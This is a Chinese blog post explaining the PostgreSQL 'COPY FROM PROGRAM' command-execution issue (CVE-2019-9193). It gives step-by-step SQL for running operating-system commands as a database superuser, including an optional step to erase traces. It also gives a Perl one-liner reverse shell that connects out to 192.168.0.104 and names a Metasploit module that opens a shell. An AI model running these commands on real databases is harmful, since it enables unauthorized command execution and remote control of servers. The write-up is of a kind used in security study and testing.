美文网首页
PostgreSQL高权限命令执行漏洞(CVE-2019-919

PostgreSQL高权限命令执行漏洞(CVE-2019-919

作者: 低调求发展 | 来源:发表于2020-03-18 18:27 被阅读0次

漏洞概述:

    PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。由于这个漏洞介于权限提升和任意代码执行之间,它需要一些前提权限,这些权限可以是通过认证正常的登录PostgreSQL也可以是通过SQL注入获得与PostgreSQL交互的途径。需要再一次说明的是,上述两种情形下都需要用户是一个超级用户或者是“pg_read_server_files”组用户。

影响版本:

    9.3-11.2

漏洞复现:

首先需要链接数据库,然后执行下列命令。

1.[可选]删除你想用来保存命令输出但是可能存在的表

DROP TABLE IF EXISTS cmd_exec;

2.创建你用来保存命令输出的表

CREATE TABLE cmd_exec(cmd_output text);

3.通过 “COPY FROM PROGRAM”执行系统命令

COPY cmd_execFROM PROGRAM 'id';

4.[可选]查看执行结果

SELECT * FROM cmd_exec;

5.[可选]清除痕迹

DROP TABLE IF EXISTS cmd_exec;

1 2

这里需要注意的是如果需要输出类似echo 'hello'命令需要用双引号转义。

在Linux及Mac OSX操作系统中通常可以通过一行简单的perl命令来反弹shell,比如:

COPY files FROM PROGRAM 'perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"192.168.0.104:80\");STDIN->fdopen($c,r);$~->fdopen($c,w);system $_ while <>;"';

msf有模块可以反弹shell,利用multi/postgres/postgres_copy_from_program_cmd_exec模块。

漏洞修复:

升级版本

相关文章

  • PostgreSQL高权限命令执行漏洞(CVE-2019-919

    漏洞概述: PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY...

  • PostgreSQL从未授权到高权限命令执行

    声明 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者...

  • 2.命令执行漏洞

    定义:攻击者可以随意执行系统命令,命令可以连接执行:&,||,| 命令执行漏洞:直接调用操作系统命令 代码执行漏洞...

  • 03.DVWA之命令注入

    漏洞概述 命令注入是指在易受攻击的应用程序中注入和执行攻击者指定的命令,执行的命令具有与web服务相同的权限和环境...

  • Reverse Shell 备忘录

    在渗透测试中,若目标存在命令执行漏洞,我们的最终目标是获得目标的系统权限,在那之前我们可以利用命令执行建立一个交互...

  • PostgreSQL 10 常用命令

    PostgreSQL 10 常用命令 重新加载配置 远程访问权限配置

  • 文件上传漏洞

    文件上传漏洞 权限 漏洞分类 利用条件 漏洞挖掘 常见可执行文件后缀

  • Samba远程命令执行漏洞(CVE-2017-7494)

    一、 实验目标 理解Samba远程命令执行漏洞的原理 掌握怎么利用Samba远程命令执行漏洞 链接:https:/...

  • 干货 | 命令执行漏洞和代码执行漏洞详解

    命令执行(RCE)漏洞和代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行 命令执行则是调用操作系...

  • 记一次失败的渗透

    利用weblogic漏洞获取了一个shell,执行系统命令,当前是管理员权限 http://x.x.x.x:700...

网友评论

      本文标题:PostgreSQL高权限命令执行漏洞(CVE-2019-919

      本文链接:https://www.haomeiwen.com/subject/hpdtyhtx.html